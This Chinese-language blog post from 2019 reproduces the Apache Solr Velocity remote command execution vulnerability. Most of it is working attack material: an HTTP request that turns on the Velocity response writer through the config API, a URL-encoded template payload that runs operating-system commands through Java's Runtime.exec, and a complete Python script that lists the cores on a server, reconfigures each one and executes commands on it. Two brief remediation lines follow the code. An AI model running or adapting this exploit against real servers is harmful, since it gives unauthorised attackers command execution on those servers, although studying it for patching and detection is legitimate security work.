apache solr远程命令执行漏洞复现

发表于 | 分类于 | | 阅读次数:
字数统计: 721 字 | 阅读时长 ≈ 12 分钟

0x00 前言

Apache Solr 是一个开源的搜索服务器,近日,国外安全研究院s00py爆出了一个apache solr的velocity的一个远程命令执行的0day,截至目前,官方未发布补丁。

0x01 漏洞复现

漏洞poc在s00py已公布,详见https://gist.githubusercontent.com/s00py/a1ba36a3689fa13759ff910e179fc133/raw/fae5e663ffac0e3996fd9dbb89438310719d347a/gistfile1.txt

首先在Core Admin查看应用路径,此处为logadmin

然后访问查看该应用config文件是否可以访问

然后利用s00py公布的poc修改向config发送json配置继续修改

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /solr/test/config HTTP/1.1
Host: solr:8983
Content-Type: application/json
Content-Length: 259

{
  "update-queryresponsewriter": {
    "startup": "lazy",
    "name": "velocity",
    "class": "solr.VelocityResponseWriter",
    "template.base.dir": "",
    "solr.resource.loader.enabled": "true",
    "params.resource.loader.enabled": "true"
  }
}

修改成功后可利用poc执行任意代码

1
GET /solr/test/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end

0x03 验证脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
import requests
import json



def get_collection(url):
	try:
		admin_solr = url + '/solr/admin/cores'
		res = requests.get(admin_solr)
		#print res.text
		colls = []

		for key in json.loads(res.text)["status"]:
			colls.append(key)
		if len(colls) > 0:
			print "[+] Get Collection Success For :" +url
			return colls
		else:
			return 0  
	except:
		print "[-] Get Collection Error For : "+url
		return -1
def set_config(url,coll):
	try:
		config_url = url +"/solr/"+coll+"/config"
		headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close", "Content-Type": "application/json"}
		json={"update-queryresponsewriter": {"class": "solr.VelocityResponseWriter", "name": "velocity", "params.resource.loader.enabled": "true", "solr.resource.loader.enabled": "true", "startup": "lazy", "template.base.dir": ""}}
		res = requests.post(config_url, headers=headers, json=json)
		if res.status_code == 200:
			print "[+] Set Config Success For :" +url+"|"+coll
			return 1
		else:
			print "[-] Set Config Failed For :"+url+"|"+coll
			return 0
	except:
		print "[-] Set Config Error For :"+url+"|"+coll
		return -1

def run_cmd(url,coll,cmd="echo boo"):

	try:
		
		poc= "/solr/"+coll+"/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27"+cmd+"%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end"
		headers = {"Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
		res = requests.get(url+poc, headers=headers)
		#print "[+] :" +res.text
		if 'boo' in res.text:
			print "[+] Vuluable : "+url+"|"+coll
		else:
			print "[+] Not Vuluable : "+url+"|"+coll
	except:
		print "[+] Run Cmd Error : "+url+"|"+coll

# c = get_collection(url)
if __name__ == '__main__':
	url = 'http://zhengbao.wang'
	colls = get_collection(url)
	if colls:
		for coll in colls:
			if set_config(url,coll):
				run_cmd(url,coll)

0x04 修复建议

  • 对solr增加访问控制
  • 及时关注官方补丁

0x05 参考链接

https://gist.githubusercontent.com/s00py/a1ba36a3689fa13759ff910e179fc133/raw/fae5e663ffac0e3996fd9dbb89438310719d347a/gistfile1.txt

本文标题:apache solr远程命令执行漏洞复现

文章作者:boogle

发布时间:2019年10月31日 - 15:05

最后更新:2019年10月31日 - 15:52

原始链接:https://zhengbao.wang/apache-solr远程命令执行漏洞复现/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

感觉写的不错,给买个棒棒糖呗